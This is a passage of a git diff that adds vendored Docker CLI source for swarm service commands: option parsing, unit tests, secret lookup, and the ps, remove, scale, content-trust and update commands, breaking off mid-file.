*swarm.ResourceRequirements { + return &swarm.ResourceRequirements{ + Limits: &swarm.Resources{ + NanoCPUs: r.limitCPU.Value(), + MemoryBytes: r.limitMemBytes.Value(), + }, + Reservations: &swarm.Resources{ + NanoCPUs: r.resCPU.Value(), + MemoryBytes: r.resMemBytes.Value(), + }, + } +} + +type restartPolicyOptions struct { + condition string + delay DurationOpt + maxAttempts Uint64Opt + window DurationOpt +} + +func (r *restartPolicyOptions) ToRestartPolicy() *swarm.RestartPolicy { + return &swarm.RestartPolicy{ + Condition: swarm.RestartPolicyCondition(r.condition), + Delay: r.delay.Value(), + MaxAttempts: r.maxAttempts.Value(), + Window: r.window.Value(), + } +} + +func convertNetworks(networks []string) []swarm.NetworkAttachmentConfig { + nets := []swarm.NetworkAttachmentConfig{} + for _, network := range networks { + nets = append(nets, swarm.NetworkAttachmentConfig{Target: network}) + } + return nets +} + +type endpointOptions struct { + mode string + publishPorts opts.PortOpt +} + +func (e *endpointOptions) ToEndpointSpec() *swarm.EndpointSpec { + return &swarm.EndpointSpec{ + Mode: swarm.ResolutionMode(strings.ToLower(e.mode)), + Ports: e.publishPorts.Value(), + } +} + +type logDriverOptions struct { + name string + opts opts.ListOpts +} + +func newLogDriverOptions() logDriverOptions { + return logDriverOptions{opts: opts.NewListOpts(runconfigopts.ValidateEnv)} +} + +func (ldo *logDriverOptions) toLogDriver() *swarm.Driver { + if ldo.name == "" { + return nil + } + + // set the log driver only if specified. 
+ return &swarm.Driver{ + Name: ldo.name, + Options: runconfigopts.ConvertKVStringsToMap(ldo.opts.GetAll()), + } +} + +type healthCheckOptions struct { + cmd string + interval PositiveDurationOpt + timeout PositiveDurationOpt + retries int + noHealthcheck bool +} + +func (opts *healthCheckOptions) toHealthConfig() (*container.HealthConfig, error) { + var healthConfig *container.HealthConfig + haveHealthSettings := opts.cmd != "" || + opts.interval.Value() != nil || + opts.timeout.Value() != nil || + opts.retries != 0 + if opts.noHealthcheck { + if haveHealthSettings { + return nil, fmt.Errorf("--%s conflicts with --health-* options", flagNoHealthcheck) + } + healthConfig = &container.HealthConfig{Test: []string{"NONE"}} + } else if haveHealthSettings { + var test []string + if opts.cmd != "" { + test = []string{"CMD-SHELL", opts.cmd} + } + var interval, timeout time.Duration + if ptr := opts.interval.Value(); ptr != nil { + interval = *ptr + } + if ptr := opts.timeout.Value(); ptr != nil { + timeout = *ptr + } + healthConfig = &container.HealthConfig{ + Test: test, + Interval: interval, + Timeout: timeout, + Retries: opts.retries, + } + } + return healthConfig, nil +} + +// ValidatePort validates a string is in the expected format for a port definition +func ValidatePort(value string) (string, error) { + portMappings, err := nat.ParsePortSpec(value) + for _, portMapping := range portMappings { + if portMapping.Binding.HostIP != "" { + return "", fmt.Errorf("HostIP is not supported by a service.") + } + } + return value, err +} + +// convertExtraHostsToSwarmHosts converts an array of extra hosts in cli +// : +// into a swarmkit host format: +// IP_address canonical_hostname [aliases...] 
+// This assumes input value (:) has already been validated +func convertExtraHostsToSwarmHosts(extraHosts []string) []string { + hosts := []string{} + for _, extraHost := range extraHosts { + parts := strings.SplitN(extraHost, ":", 2) + hosts = append(hosts, fmt.Sprintf("%s %s", parts[1], parts[0])) + } + return hosts +} + +type serviceOptions struct { + name string + labels opts.ListOpts + containerLabels opts.ListOpts + image string + args []string + hostname string + env opts.ListOpts + envFile opts.ListOpts + workdir string + user string + groups opts.ListOpts + tty bool + mounts opts.MountOpt + dns opts.ListOpts + dnsSearch opts.ListOpts + dnsOption opts.ListOpts + hosts opts.ListOpts + + resources resourceOptions + stopGrace DurationOpt + + replicas Uint64Opt + mode string + + restartPolicy restartPolicyOptions + constraints opts.ListOpts + update updateOptions + networks opts.ListOpts + endpoint endpointOptions + + registryAuth bool + + logDriver logDriverOptions + + healthcheck healthCheckOptions + secrets opts.SecretOpt +} + +func newServiceOptions() *serviceOptions { + return &serviceOptions{ + labels: opts.NewListOpts(runconfigopts.ValidateEnv), + constraints: opts.NewListOpts(nil), + containerLabels: opts.NewListOpts(runconfigopts.ValidateEnv), + env: opts.NewListOpts(runconfigopts.ValidateEnv), + envFile: opts.NewListOpts(nil), + groups: opts.NewListOpts(nil), + logDriver: newLogDriverOptions(), + dns: opts.NewListOpts(opts.ValidateIPAddress), + dnsOption: opts.NewListOpts(nil), + dnsSearch: opts.NewListOpts(opts.ValidateDNSSearch), + hosts: opts.NewListOpts(runconfigopts.ValidateExtraHost), + networks: opts.NewListOpts(nil), + } +} + +func (opts *serviceOptions) ToService() (swarm.ServiceSpec, error) { + var service swarm.ServiceSpec + + envVariables, err := runconfigopts.ReadKVStrings(opts.envFile.GetAll(), opts.env.GetAll()) + if err != nil { + return service, err + } + + currentEnv := make([]string, 0, len(envVariables)) + for _, env := range 
envVariables { // need to process each var, in order + k := strings.SplitN(env, "=", 2)[0] + for i, current := range currentEnv { // remove duplicates + if current == env { + continue // no update required, may hide this behind flag to preserve order of envVariables + } + if strings.HasPrefix(current, k+"=") { + currentEnv = append(currentEnv[:i], currentEnv[i+1:]...) + } + } + currentEnv = append(currentEnv, env) + } + + service = swarm.ServiceSpec{ + Annotations: swarm.Annotations{ + Name: opts.name, + Labels: runconfigopts.ConvertKVStringsToMap(opts.labels.GetAll()), + }, + TaskTemplate: swarm.TaskSpec{ + ContainerSpec: swarm.ContainerSpec{ + Image: opts.image, + Args: opts.args, + Env: currentEnv, + Hostname: opts.hostname, + Labels: runconfigopts.ConvertKVStringsToMap(opts.containerLabels.GetAll()), + Dir: opts.workdir, + User: opts.user, + Groups: opts.groups.GetAll(), + TTY: opts.tty, + Mounts: opts.mounts.Value(), + DNSConfig: &swarm.DNSConfig{ + Nameservers: opts.dns.GetAll(), + Search: opts.dnsSearch.GetAll(), + Options: opts.dnsOption.GetAll(), + }, + Hosts: convertExtraHostsToSwarmHosts(opts.hosts.GetAll()), + StopGracePeriod: opts.stopGrace.Value(), + Secrets: nil, + }, + Networks: convertNetworks(opts.networks.GetAll()), + Resources: opts.resources.ToResourceRequirements(), + RestartPolicy: opts.restartPolicy.ToRestartPolicy(), + Placement: &swarm.Placement{ + Constraints: opts.constraints.GetAll(), + }, + LogDriver: opts.logDriver.toLogDriver(), + }, + Networks: convertNetworks(opts.networks.GetAll()), + Mode: swarm.ServiceMode{}, + UpdateConfig: &swarm.UpdateConfig{ + Parallelism: opts.update.parallelism, + Delay: opts.update.delay, + Monitor: opts.update.monitor, + FailureAction: opts.update.onFailure, + MaxFailureRatio: opts.update.maxFailureRatio.Value(), + }, + EndpointSpec: opts.endpoint.ToEndpointSpec(), + } + + healthConfig, err := opts.healthcheck.toHealthConfig() + if err != nil { + return service, err + } + 
service.TaskTemplate.ContainerSpec.Healthcheck = healthConfig + + switch opts.mode { + case "global": + if opts.replicas.Value() != nil { + return service, fmt.Errorf("replicas can only be used with replicated mode") + } + + service.Mode.Global = &swarm.GlobalService{} + case "replicated": + service.Mode.Replicated = &swarm.ReplicatedService{ + Replicas: opts.replicas.Value(), + } + default: + return service, fmt.Errorf("Unknown mode: %s", opts.mode) + } + return service, nil +} + +// addServiceFlags adds all flags that are common to both `create` and `update`. +// Any flags that are not common are added separately in the individual command +func addServiceFlags(cmd *cobra.Command, opts *serviceOptions) { + flags := cmd.Flags() + + flags.StringVarP(&opts.workdir, flagWorkdir, "w", "", "Working directory inside the container") + flags.StringVarP(&opts.user, flagUser, "u", "", "Username or UID (format: [:])") + flags.StringVar(&opts.hostname, flagHostname, "", "Container hostname") + + flags.Var(&opts.resources.limitCPU, flagLimitCPU, "Limit CPUs") + flags.Var(&opts.resources.limitMemBytes, flagLimitMemory, "Limit Memory") + flags.Var(&opts.resources.resCPU, flagReserveCPU, "Reserve CPUs") + flags.Var(&opts.resources.resMemBytes, flagReserveMemory, "Reserve Memory") + flags.Var(&opts.stopGrace, flagStopGracePeriod, "Time to wait before force killing a container (ns|us|ms|s|m|h)") + + flags.Var(&opts.replicas, flagReplicas, "Number of tasks") + + flags.StringVar(&opts.restartPolicy.condition, flagRestartCondition, "", "Restart when condition is met (none, on-failure, or any)") + flags.Var(&opts.restartPolicy.delay, flagRestartDelay, "Delay between restart attempts (ns|us|ms|s|m|h)") + flags.Var(&opts.restartPolicy.maxAttempts, flagRestartMaxAttempts, "Maximum number of restarts before giving up") + flags.Var(&opts.restartPolicy.window, flagRestartWindow, "Window used to evaluate the restart policy (ns|us|ms|s|m|h)") + + flags.Uint64Var(&opts.update.parallelism, 
flagUpdateParallelism, 1, "Maximum number of tasks updated simultaneously (0 to update all at once)") + flags.DurationVar(&opts.update.delay, flagUpdateDelay, time.Duration(0), "Delay between updates (ns|us|ms|s|m|h) (default 0s)") + flags.DurationVar(&opts.update.monitor, flagUpdateMonitor, time.Duration(0), "Duration after each task update to monitor for failure (ns|us|ms|s|m|h) (default 0s)") + flags.StringVar(&opts.update.onFailure, flagUpdateFailureAction, "pause", "Action on update failure (pause|continue)") + flags.Var(&opts.update.maxFailureRatio, flagUpdateMaxFailureRatio, "Failure rate to tolerate during an update") + + flags.StringVar(&opts.endpoint.mode, flagEndpointMode, "", "Endpoint mode (vip or dnsrr)") + + flags.BoolVar(&opts.registryAuth, flagRegistryAuth, false, "Send registry authentication details to swarm agents") + + flags.StringVar(&opts.logDriver.name, flagLogDriver, "", "Logging driver for service") + flags.Var(&opts.logDriver.opts, flagLogOpt, "Logging driver options") + + flags.StringVar(&opts.healthcheck.cmd, flagHealthCmd, "", "Command to run to check health") + flags.Var(&opts.healthcheck.interval, flagHealthInterval, "Time between running the check (ns|us|ms|s|m|h)") + flags.Var(&opts.healthcheck.timeout, flagHealthTimeout, "Maximum time to allow one check to run (ns|us|ms|s|m|h)") + flags.IntVar(&opts.healthcheck.retries, flagHealthRetries, 0, "Consecutive failures needed to report unhealthy") + flags.BoolVar(&opts.healthcheck.noHealthcheck, flagNoHealthcheck, false, "Disable any container-specified HEALTHCHECK") + + flags.BoolVarP(&opts.tty, flagTTY, "t", false, "Allocate a pseudo-TTY") +} + +const ( + flagConstraint = "constraint" + flagConstraintRemove = "constraint-rm" + flagConstraintAdd = "constraint-add" + flagContainerLabel = "container-label" + flagContainerLabelRemove = "container-label-rm" + flagContainerLabelAdd = "container-label-add" + flagDNS = "dns" + flagDNSRemove = "dns-rm" + flagDNSAdd = "dns-add" + flagDNSOption 
= "dns-option" + flagDNSOptionRemove = "dns-option-rm" + flagDNSOptionAdd = "dns-option-add" + flagDNSSearch = "dns-search" + flagDNSSearchRemove = "dns-search-rm" + flagDNSSearchAdd = "dns-search-add" + flagEndpointMode = "endpoint-mode" + flagHost = "host" + flagHostAdd = "host-add" + flagHostRemove = "host-rm" + flagHostname = "hostname" + flagEnv = "env" + flagEnvFile = "env-file" + flagEnvRemove = "env-rm" + flagEnvAdd = "env-add" + flagGroup = "group" + flagGroupAdd = "group-add" + flagGroupRemove = "group-rm" + flagLabel = "label" + flagLabelRemove = "label-rm" + flagLabelAdd = "label-add" + flagLimitCPU = "limit-cpu" + flagLimitMemory = "limit-memory" + flagMode = "mode" + flagMount = "mount" + flagMountRemove = "mount-rm" + flagMountAdd = "mount-add" + flagName = "name" + flagNetwork = "network" + flagPublish = "publish" + flagPublishRemove = "publish-rm" + flagPublishAdd = "publish-add" + flagReplicas = "replicas" + flagReserveCPU = "reserve-cpu" + flagReserveMemory = "reserve-memory" + flagRestartCondition = "restart-condition" + flagRestartDelay = "restart-delay" + flagRestartMaxAttempts = "restart-max-attempts" + flagRestartWindow = "restart-window" + flagStopGracePeriod = "stop-grace-period" + flagTTY = "tty" + flagUpdateDelay = "update-delay" + flagUpdateFailureAction = "update-failure-action" + flagUpdateMaxFailureRatio = "update-max-failure-ratio" + flagUpdateMonitor = "update-monitor" + flagUpdateParallelism = "update-parallelism" + flagUser = "user" + flagWorkdir = "workdir" + flagRegistryAuth = "with-registry-auth" + flagLogDriver = "log-driver" + flagLogOpt = "log-opt" + flagHealthCmd = "health-cmd" + flagHealthInterval = "health-interval" + flagHealthRetries = "health-retries" + flagHealthTimeout = "health-timeout" + flagNoHealthcheck = "no-healthcheck" + flagSecret = "secret" + flagSecretAdd = "secret-add" + flagSecretRemove = "secret-rm" +) diff --git a/vendor/github.com/docker/docker/cli/command/service/opts_test.go 
b/vendor/github.com/docker/docker/cli/command/service/opts_test.go new file mode 100644 index 0000000000..78b956ad67 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/service/opts_test.go @@ -0,0 +1,107 @@ +package service + +import ( + "reflect" + "testing" + "time" + + "github.com/docker/docker/api/types/container" + "github.com/docker/docker/opts" + "github.com/docker/docker/pkg/testutil/assert" +) + +func TestMemBytesString(t *testing.T) { + var mem memBytes = 1048576 + assert.Equal(t, mem.String(), "1 MiB") +} + +func TestMemBytesSetAndValue(t *testing.T) { + var mem memBytes + assert.NilError(t, mem.Set("5kb")) + assert.Equal(t, mem.Value(), int64(5120)) +} + +func TestNanoCPUsString(t *testing.T) { + var cpus opts.NanoCPUs = 6100000000 + assert.Equal(t, cpus.String(), "6.100") +} + +func TestNanoCPUsSetAndValue(t *testing.T) { + var cpus opts.NanoCPUs + assert.NilError(t, cpus.Set("0.35")) + assert.Equal(t, cpus.Value(), int64(350000000)) +} + +func TestDurationOptString(t *testing.T) { + dur := time.Duration(300 * 10e8) + duration := DurationOpt{value: &dur} + assert.Equal(t, duration.String(), "5m0s") +} + +func TestDurationOptSetAndValue(t *testing.T) { + var duration DurationOpt + assert.NilError(t, duration.Set("300s")) + assert.Equal(t, *duration.Value(), time.Duration(300*10e8)) + assert.NilError(t, duration.Set("-300s")) + assert.Equal(t, *duration.Value(), time.Duration(-300*10e8)) +} + +func TestPositiveDurationOptSetAndValue(t *testing.T) { + var duration PositiveDurationOpt + assert.NilError(t, duration.Set("300s")) + assert.Equal(t, *duration.Value(), time.Duration(300*10e8)) + assert.Error(t, duration.Set("-300s"), "cannot be negative") +} + +func TestUint64OptString(t *testing.T) { + value := uint64(2345678) + opt := Uint64Opt{value: &value} + assert.Equal(t, opt.String(), "2345678") + + opt = Uint64Opt{} + assert.Equal(t, opt.String(), "") +} + +func TestUint64OptSetAndValue(t *testing.T) { + var opt Uint64Opt + 
assert.NilError(t, opt.Set("14445")) + assert.Equal(t, *opt.Value(), uint64(14445)) +} + +func TestHealthCheckOptionsToHealthConfig(t *testing.T) { + dur := time.Second + opt := healthCheckOptions{ + cmd: "curl", + interval: PositiveDurationOpt{DurationOpt{value: &dur}}, + timeout: PositiveDurationOpt{DurationOpt{value: &dur}}, + retries: 10, + } + config, err := opt.toHealthConfig() + assert.NilError(t, err) + assert.Equal(t, reflect.DeepEqual(config, &container.HealthConfig{ + Test: []string{"CMD-SHELL", "curl"}, + Interval: time.Second, + Timeout: time.Second, + Retries: 10, + }), true) +} + +func TestHealthCheckOptionsToHealthConfigNoHealthcheck(t *testing.T) { + opt := healthCheckOptions{ + noHealthcheck: true, + } + config, err := opt.toHealthConfig() + assert.NilError(t, err) + assert.Equal(t, reflect.DeepEqual(config, &container.HealthConfig{ + Test: []string{"NONE"}, + }), true) +} + +func TestHealthCheckOptionsToHealthConfigConflict(t *testing.T) { + opt := healthCheckOptions{ + cmd: "curl", + noHealthcheck: true, + } + _, err := opt.toHealthConfig() + assert.Error(t, err, "--no-healthcheck conflicts with --health-* options") +} diff --git a/vendor/github.com/docker/docker/cli/command/service/parse.go b/vendor/github.com/docker/docker/cli/command/service/parse.go new file mode 100644 index 0000000000..ce9b454edd --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/service/parse.go @@ -0,0 +1,68 @@ +package service + +import ( + "fmt" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/filters" + swarmtypes "github.com/docker/docker/api/types/swarm" + "github.com/docker/docker/client" + "golang.org/x/net/context" +) + +// ParseSecrets retrieves the secrets from the requested names and converts +// them to secret references to use with the spec +func ParseSecrets(client client.SecretAPIClient, requestedSecrets []*types.SecretRequestOption) ([]*swarmtypes.SecretReference, error) { + secretRefs := 
make(map[string]*swarmtypes.SecretReference) + ctx := context.Background() + + for _, secret := range requestedSecrets { + if _, exists := secretRefs[secret.Target]; exists { + return nil, fmt.Errorf("duplicate secret target for %s not allowed", secret.Source) + } + secretRef := &swarmtypes.SecretReference{ + File: &swarmtypes.SecretReferenceFileTarget{ + Name: secret.Target, + UID: secret.UID, + GID: secret.GID, + Mode: secret.Mode, + }, + SecretName: secret.Source, + } + + secretRefs[secret.Target] = secretRef + } + + args := filters.NewArgs() + for _, s := range secretRefs { + args.Add("names", s.SecretName) + } + + secrets, err := client.SecretList(ctx, types.SecretListOptions{ + Filters: args, + }) + if err != nil { + return nil, err + } + + foundSecrets := make(map[string]string) + for _, secret := range secrets { + foundSecrets[secret.Spec.Annotations.Name] = secret.ID + } + + addedSecrets := []*swarmtypes.SecretReference{} + + for _, ref := range secretRefs { + id, ok := foundSecrets[ref.SecretName] + if !ok { + return nil, fmt.Errorf("secret not found: %s", ref.SecretName) + } + + // set the id for the ref to properly assign in swarm + // since swarm needs the ID instead of the name + ref.SecretID = id + addedSecrets = append(addedSecrets, ref) + } + + return addedSecrets, nil +} diff --git a/vendor/github.com/docker/docker/cli/command/service/ps.go b/vendor/github.com/docker/docker/cli/command/service/ps.go new file mode 100644 index 0000000000..cf94ad7374 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/service/ps.go @@ -0,0 +1,76 @@ +package service + +import ( + "github.com/docker/docker/api/types" + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/docker/docker/cli/command/idresolver" + "github.com/docker/docker/cli/command/node" + "github.com/docker/docker/cli/command/task" + "github.com/docker/docker/opts" + "github.com/spf13/cobra" + "golang.org/x/net/context" +) + +type psOptions struct { + 
serviceID string + quiet bool + noResolve bool + noTrunc bool + filter opts.FilterOpt +} + +func newPsCommand(dockerCli *command.DockerCli) *cobra.Command { + opts := psOptions{filter: opts.NewFilterOpt()} + + cmd := &cobra.Command{ + Use: "ps [OPTIONS] SERVICE", + Short: "List the tasks of a service", + Args: cli.ExactArgs(1), + RunE: func(cmd *cobra.Command, args []string) error { + opts.serviceID = args[0] + return runPS(dockerCli, opts) + }, + } + flags := cmd.Flags() + flags.BoolVarP(&opts.quiet, "quiet", "q", false, "Only display task IDs") + flags.BoolVar(&opts.noTrunc, "no-trunc", false, "Do not truncate output") + flags.BoolVar(&opts.noResolve, "no-resolve", false, "Do not map IDs to Names") + flags.VarP(&opts.filter, "filter", "f", "Filter output based on conditions provided") + + return cmd +} + +func runPS(dockerCli *command.DockerCli, opts psOptions) error { + client := dockerCli.Client() + ctx := context.Background() + + service, _, err := client.ServiceInspectWithRaw(ctx, opts.serviceID) + if err != nil { + return err + } + + filter := opts.filter.Value() + filter.Add("service", service.ID) + if filter.Include("node") { + nodeFilters := filter.Get("node") + for _, nodeFilter := range nodeFilters { + nodeReference, err := node.Reference(ctx, client, nodeFilter) + if err != nil { + return err + } + filter.Del("node", nodeFilter) + filter.Add("node", nodeReference) + } + } + + tasks, err := client.TaskList(ctx, types.TaskListOptions{Filters: filter}) + if err != nil { + return err + } + + if opts.quiet { + return task.PrintQuiet(dockerCli, tasks) + } + return task.Print(dockerCli, ctx, tasks, idresolver.New(client, opts.noResolve), opts.noTrunc) +} diff --git a/vendor/github.com/docker/docker/cli/command/service/remove.go b/vendor/github.com/docker/docker/cli/command/service/remove.go new file mode 100644 index 0000000000..c3fbbabbca --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/service/remove.go @@ -0,0 +1,47 @@ +package service + 
+import ( + "fmt" + "strings" + + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/spf13/cobra" + "golang.org/x/net/context" +) + +func newRemoveCommand(dockerCli *command.DockerCli) *cobra.Command { + + cmd := &cobra.Command{ + Use: "rm SERVICE [SERVICE...]", + Aliases: []string{"remove"}, + Short: "Remove one or more services", + Args: cli.RequiresMinArgs(1), + RunE: func(cmd *cobra.Command, args []string) error { + return runRemove(dockerCli, args) + }, + } + cmd.Flags() + + return cmd +} + +func runRemove(dockerCli *command.DockerCli, sids []string) error { + client := dockerCli.Client() + + ctx := context.Background() + + var errs []string + for _, sid := range sids { + err := client.ServiceRemove(ctx, sid) + if err != nil { + errs = append(errs, err.Error()) + continue + } + fmt.Fprintf(dockerCli.Out(), "%s\n", sid) + } + if len(errs) > 0 { + return fmt.Errorf(strings.Join(errs, "\n")) + } + return nil +} diff --git a/vendor/github.com/docker/docker/cli/command/service/scale.go b/vendor/github.com/docker/docker/cli/command/service/scale.go new file mode 100644 index 0000000000..cf89e90273 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/service/scale.go @@ -0,0 +1,96 @@ +package service + +import ( + "fmt" + "strconv" + "strings" + + "golang.org/x/net/context" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/spf13/cobra" +) + +func newScaleCommand(dockerCli *command.DockerCli) *cobra.Command { + return &cobra.Command{ + Use: "scale SERVICE=REPLICAS [SERVICE=REPLICAS...]", + Short: "Scale one or multiple replicated services", + Args: scaleArgs, + RunE: func(cmd *cobra.Command, args []string) error { + return runScale(dockerCli, args) + }, + } +} + +func scaleArgs(cmd *cobra.Command, args []string) error { + if err := cli.RequiresMinArgs(1)(cmd, args); err != nil { + return err + } + for _, arg := range args { + if parts := 
strings.SplitN(arg, "=", 2); len(parts) != 2 { + return fmt.Errorf( + "Invalid scale specifier '%s'.\nSee '%s --help'.\n\nUsage: %s\n\n%s", + arg, + cmd.CommandPath(), + cmd.UseLine(), + cmd.Short, + ) + } + } + return nil +} + +func runScale(dockerCli *command.DockerCli, args []string) error { + var errors []string + for _, arg := range args { + parts := strings.SplitN(arg, "=", 2) + serviceID, scaleStr := parts[0], parts[1] + + // validate input arg scale number + scale, err := strconv.ParseUint(scaleStr, 10, 64) + if err != nil { + errors = append(errors, fmt.Sprintf("%s: invalid replicas value %s: %v", serviceID, scaleStr, err)) + continue + } + + if err := runServiceScale(dockerCli, serviceID, scale); err != nil { + errors = append(errors, fmt.Sprintf("%s: %v", serviceID, err)) + } + } + + if len(errors) == 0 { + return nil + } + return fmt.Errorf(strings.Join(errors, "\n")) +} + +func runServiceScale(dockerCli *command.DockerCli, serviceID string, scale uint64) error { + client := dockerCli.Client() + ctx := context.Background() + + service, _, err := client.ServiceInspectWithRaw(ctx, serviceID) + if err != nil { + return err + } + + serviceMode := &service.Spec.Mode + if serviceMode.Replicated == nil { + return fmt.Errorf("scale can only be used with replicated mode") + } + + serviceMode.Replicated.Replicas = &scale + + response, err := client.ServiceUpdate(ctx, service.ID, service.Version, service.Spec, types.ServiceUpdateOptions{}) + if err != nil { + return err + } + + for _, warning := range response.Warnings { + fmt.Fprintln(dockerCli.Err(), warning) + } + + fmt.Fprintf(dockerCli.Out(), "%s scaled to %d\n", serviceID, scale) + return nil +} diff --git a/vendor/github.com/docker/docker/cli/command/service/trust.go b/vendor/github.com/docker/docker/cli/command/service/trust.go new file mode 100644 index 0000000000..052d49c32a --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/service/trust.go @@ -0,0 +1,96 @@ +package service + +import ( + 
"encoding/hex" + "fmt" + + "github.com/Sirupsen/logrus" + "github.com/docker/distribution/digest" + distreference "github.com/docker/distribution/reference" + "github.com/docker/docker/api/types/swarm" + "github.com/docker/docker/cli/command" + "github.com/docker/docker/cli/trust" + "github.com/docker/docker/reference" + "github.com/docker/docker/registry" + "github.com/docker/notary/tuf/data" + "github.com/pkg/errors" + "golang.org/x/net/context" +) + +func resolveServiceImageDigest(dockerCli *command.DockerCli, service *swarm.ServiceSpec) error { + if !command.IsTrusted() { + // Digests are resolved by the daemon when not using content + // trust. + return nil + } + + image := service.TaskTemplate.ContainerSpec.Image + + // We only attempt to resolve the digest if the reference + // could be parsed as a digest reference. Specifying an image ID + // is valid but not resolvable. There is no warning message for + // an image ID because it's valid to use one. + if _, err := digest.ParseDigest(image); err == nil { + return nil + } + + ref, err := reference.ParseNamed(image) + if err != nil { + return fmt.Errorf("Could not parse image reference %s", service.TaskTemplate.ContainerSpec.Image) + } + if _, ok := ref.(reference.Canonical); !ok { + ref = reference.WithDefaultTag(ref) + + taggedRef, ok := ref.(reference.NamedTagged) + if !ok { + // This should never happen because a reference either + // has a digest, or WithDefaultTag would give it a tag. 
+ return errors.New("Failed to resolve image digest using content trust: reference is missing a tag") + } + + resolvedImage, err := trustedResolveDigest(context.Background(), dockerCli, taggedRef) + if err != nil { + return fmt.Errorf("Failed to resolve image digest using content trust: %v", err) + } + logrus.Debugf("resolved image tag to %s using content trust", resolvedImage.String()) + service.TaskTemplate.ContainerSpec.Image = resolvedImage.String() + } + return nil +} + +func trustedResolveDigest(ctx context.Context, cli *command.DockerCli, ref reference.NamedTagged) (distreference.Canonical, error) { + repoInfo, err := registry.ParseRepositoryInfo(ref) + if err != nil { + return nil, err + } + + authConfig := command.ResolveAuthConfig(ctx, cli, repoInfo.Index) + + notaryRepo, err := trust.GetNotaryRepository(cli, repoInfo, authConfig, "pull") + if err != nil { + return nil, errors.Wrap(err, "error establishing connection to trust repository") + } + + t, err := notaryRepo.GetTargetByName(ref.Tag(), trust.ReleasesRole, data.CanonicalTargetsRole) + if err != nil { + return nil, trust.NotaryError(repoInfo.FullName(), err) + } + // Only get the tag if it's in the top level targets role or the releases delegation role + // ignore it if it's in any other delegation roles + if t.Role != trust.ReleasesRole && t.Role != data.CanonicalTargetsRole { + return nil, trust.NotaryError(repoInfo.FullName(), fmt.Errorf("No trust data for %s", ref.String())) + } + + logrus.Debugf("retrieving target for %s role\n", t.Role) + h, ok := t.Hashes["sha256"] + if !ok { + return nil, errors.New("no valid hash, expecting sha256") + } + + dgst := digest.NewDigestFromHex("sha256", hex.EncodeToString(h)) + + // Using distribution reference package to make sure that adding a + // digest does not erase the tag. When the two reference packages + // are unified, this will no longer be an issue. 
+ return distreference.WithDigest(ref, dgst) +} diff --git a/vendor/github.com/docker/docker/cli/command/service/update.go b/vendor/github.com/docker/docker/cli/command/service/update.go new file mode 100644 index 0000000000..d56de10913 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/service/update.go @@ -0,0 +1,849 @@ +package service + +import ( + "fmt" + "sort" + "strings" + "time" + + "golang.org/x/net/context" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/container" + mounttypes "github.com/docker/docker/api/types/mount" + "github.com/docker/docker/api/types/swarm" + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/docker/docker/client" + "github.com/docker/docker/opts" + runconfigopts "github.com/docker/docker/runconfig/opts" + "github.com/docker/go-connections/nat" + shlex "github.com/flynn-archive/go-shlex" + "github.com/spf13/cobra" + "github.com/spf13/pflag" +) + +func newUpdateCommand(dockerCli *command.DockerCli) *cobra.Command { + serviceOpts := newServiceOptions() + + cmd := &cobra.Command{ + Use: "update [OPTIONS] SERVICE", + Short: "Update a service", + Args: cli.ExactArgs(1), + RunE: func(cmd *cobra.Command, args []string) error { + return runUpdate(dockerCli, cmd.Flags(), args[0]) + }, + } + + flags := cmd.Flags() + flags.String("image", "", "Service image tag") + flags.String("args", "", "Service command args") + flags.Bool("rollback", false, "Rollback to previous specification") + flags.Bool("force", false, "Force update even if no changes require it") + addServiceFlags(cmd, serviceOpts) + + flags.Var(newListOptsVar(), flagEnvRemove, "Remove an environment variable") + flags.Var(newListOptsVar(), flagGroupRemove, "Remove a previously added supplementary user group from the container") + flags.Var(newListOptsVar(), flagLabelRemove, "Remove a label by its key") + flags.Var(newListOptsVar(), flagContainerLabelRemove, "Remove a container label by its key") + 
flags.Var(newListOptsVar(), flagMountRemove, "Remove a mount by its target path") + // flags.Var(newListOptsVar().WithValidator(validatePublishRemove), flagPublishRemove, "Remove a published port by its target port") + flags.Var(&opts.PortOpt{}, flagPublishRemove, "Remove a published port by its target port") + flags.Var(newListOptsVar(), flagConstraintRemove, "Remove a constraint") + flags.Var(newListOptsVar(), flagDNSRemove, "Remove a custom DNS server") + flags.Var(newListOptsVar(), flagDNSOptionRemove, "Remove a DNS option") + flags.Var(newListOptsVar(), flagDNSSearchRemove, "Remove a DNS search domain") + flags.Var(newListOptsVar(), flagHostRemove, "Remove a custom host-to-IP mapping (host:ip)") + flags.Var(&serviceOpts.labels, flagLabelAdd, "Add or update a service label") + flags.Var(&serviceOpts.containerLabels, flagContainerLabelAdd, "Add or update a container label") + flags.Var(&serviceOpts.env, flagEnvAdd, "Add or update an environment variable") + flags.Var(newListOptsVar(), flagSecretRemove, "Remove a secret") + flags.Var(&serviceOpts.secrets, flagSecretAdd, "Add or update a secret on a service") + flags.Var(&serviceOpts.mounts, flagMountAdd, "Add or update a mount on a service") + flags.Var(&serviceOpts.constraints, flagConstraintAdd, "Add or update a placement constraint") + flags.Var(&serviceOpts.endpoint.publishPorts, flagPublishAdd, "Add or update a published port") + flags.Var(&serviceOpts.groups, flagGroupAdd, "Add an additional supplementary user group to the container") + flags.Var(&serviceOpts.dns, flagDNSAdd, "Add or update a custom DNS server") + flags.Var(&serviceOpts.dnsOption, flagDNSOptionAdd, "Add or update a DNS option") + flags.Var(&serviceOpts.dnsSearch, flagDNSSearchAdd, "Add or update a custom DNS search domain") + flags.Var(&serviceOpts.hosts, flagHostAdd, "Add or update a custom host-to-IP mapping (host:ip)") + + return cmd +} + +func newListOptsVar() *opts.ListOpts { + return opts.NewListOptsRef(&[]string{}, nil) +} + +func 
